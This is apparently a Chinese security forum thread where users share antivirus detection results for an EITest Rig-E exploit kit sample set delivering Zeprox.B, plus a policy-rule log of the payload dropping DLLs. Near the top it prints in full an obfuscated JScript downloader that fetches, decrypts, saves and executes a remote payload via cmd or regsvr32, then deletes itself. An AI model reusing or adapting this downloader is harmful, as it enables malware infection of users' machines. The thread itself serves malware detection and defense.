高级远控

彩虹丶//

\Desktop\2016-12-19-EITest-Rig-E-sends-Zeprox.B-malware-and-artifacts\2016-12-19-EITest-Rig-E-payload-Zeprox.B-rad57C53.tmp.exe
  [检测]        是 TR/AD.Zlader.tmwes 特洛伊木马
  [警告]        已忽略该文件.
\Desktop\2016-12-19-EITest-Rig-E-sends-Zeprox.B-malware-and-artifacts\2016-12-19-EITest-Rig-E-artifacts-OTTYUADAF.txt
  [检测]        包含 HTML/ExpKit.Gen6 HTML 脚本病毒的识别模式
  [警告]        已忽略该文件.




function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=255,a=0;r+1>a;a++)b[a]=a;for(a=0;r+1>a;a++)c=c+b[a]+g[v](a%g.length)&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromCharCode";e<n.length;e++)a=a+1&r,c=c+b[a]&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)^b[b[a]+b[c]&r]));return i[u(15)](u(11))};function H(g){var T=u(0),d=W(T+"."+T+u(1));d["setProxy"](n);d.open(u(2),g(1),n);d./**/Option(0)=g(2);d["Sen\x64"];A="responseText";if(0310==d./**/status)return O(d[A],g(n))};T="WinHTTPMRequest.5.1MGE";E=T+"TMScripting.FileSystemObjectMWScript.ShellMA"+"DODB.StreamMeroM.ex",u=function(x){return E.split("M")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+="eMG\x65tTe"+"mpNameMcharCodeAtMiso-8859-1MMin"+"dexOfM.dllMScriptFullNameMjoinMrunM /c M /\x73 ";var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=WScript,L=U[u(14)],v=u(9),m=U.Arguments;s.Type=2;c=q[u(8)]();s.Charset=u(012);s.Open();i=H(m);d=i[v](i[u(12)]("P\x45\x00\x00")+027);s.writetext(i);if(037<d){var z=1;c+=u(13)}else c+=p;s.savetofile(c,2);s./*E*/Close();Q=u(18);z&&(c="regsvr"+040+p+Q+c);j.run("c\x6Dd"+p+u(17)+c,0)}catch(Y){}R="\x44eletefile";q[R](L);


没看懂

dongwenqi

Dolby123 发表于 2016-12-20 14:10
卡巴

编辑: 补多一个图

感谢您的帮助，在您提交的附件中已经发现新的恶意软件，请稍后更新最新数据库试一下
2016-12-19-EITest-Rig-E-flash-exploit.swf - HEUR:Exploit.SWF.Agent.gen
2016-12-19-EITest-Rig-E-landing-page.txt - HEUR:Exploit.Script.Generic
2016-12-19-EITest-Rig-E-payload-Zeprox.B-rad57C53.tmp.exe_ - Trojan.Win32.Inject.acrpy
2016-12-19-EITest-Rig-E-artifacts-OTTYUADAF.txt - HEUR:Trojan-Downloader.Script.Generic

dongwenqi

轩夏 发表于 2016-12-20 14:40
卡巴

2016-12-19-EITest-Rig-E-artifacts-OTTYUADAF.txt                HEUR:Trojan.Script.Generic

感谢您的帮助，在您提交的附件中已经发现新的恶意软件，请稍后更新最新数据库试一下
2016-12-19-EITest-Rig-E-flash-exploit.swf - HEUR:Exploit.SWF.Agent.gen
2016-12-19-EITest-Rig-E-landing-page.txt - HEUR:Exploit.Script.Generic
2016-12-19-EITest-Rig-E-payload-Zeprox.B-rad57C53.tmp.exe_ - Trojan.Win32.Inject.acrpy
2016-12-19-EITest-Rig-E-artifacts-OTTYUADAF.txt - HEUR:Trojan-Downloader.Script.Generic

liulangzhecgr

用组策略对付此类病毒：

2016/12/21 13:20:12    创建新进程    允许
进程: c:\windows\explorer.exe
目标: c:\program files\virustest\2016-12-19-eitest-rig-e-sends-zeprox.b-malware-and-artifacts\2016-12-19-eitest-rig-e-payload-zeprox.b-rad57c53.exe
命令行: "C:\Program Files\VirusTest\2016-12-19-EITest-Rig-E-sends-Zeprox.B-malware-and-artifacts\2016-12-19-EITest-Rig-E-payload-Zeprox.B-rad57C53.exe"
规则: [应用程序]c:\windows\explorer.exe

2016/12/21 13:21:54    创建文件    允许
进程: c:\program files\virustest\2016-12-19-eitest-rig-e-sends-zeprox.b-malware-and-artifacts\2016-12-19-eitest-rig-e-payload-zeprox.b-rad57c53.exe
目标: C:\Users\yiqing\AppData\Local\Temp\raincoat.dll
规则: [应用程序组]病毒测试 -> [文件组]所有执行文件 -> [文件]*; *.dll

2016/12/21 13:22:10    创建文件    允许
进程: c:\program files\virustest\2016-12-19-eitest-rig-e-sends-zeprox.b-malware-and-artifacts\2016-12-19-eitest-rig-e-payload-zeprox.b-rad57c53.exe
目标: C:\Users\yiqing\AppData\Local\Temp\nsm21C9.tmp\System.dll
规则: [应用程序组]病毒测试 -> [文件组]所有执行文件 -> [文件]*; *.dll

2016/12/21 13:22:15    加载动态链接库    允许
进程: c:\program files\virustest\2016-12-19-eitest-rig-e-sends-zeprox.b-malware-and-artifacts\2016-12-19-eitest-rig-e-payload-zeprox.b-rad57c53.exe
目标: c:\users\yiqing\appdata\local\temp\nsm21c9.tmp\system.dll
规则: [应用程序组]病毒测试 -> [动态链接库]*

MelissaBenoist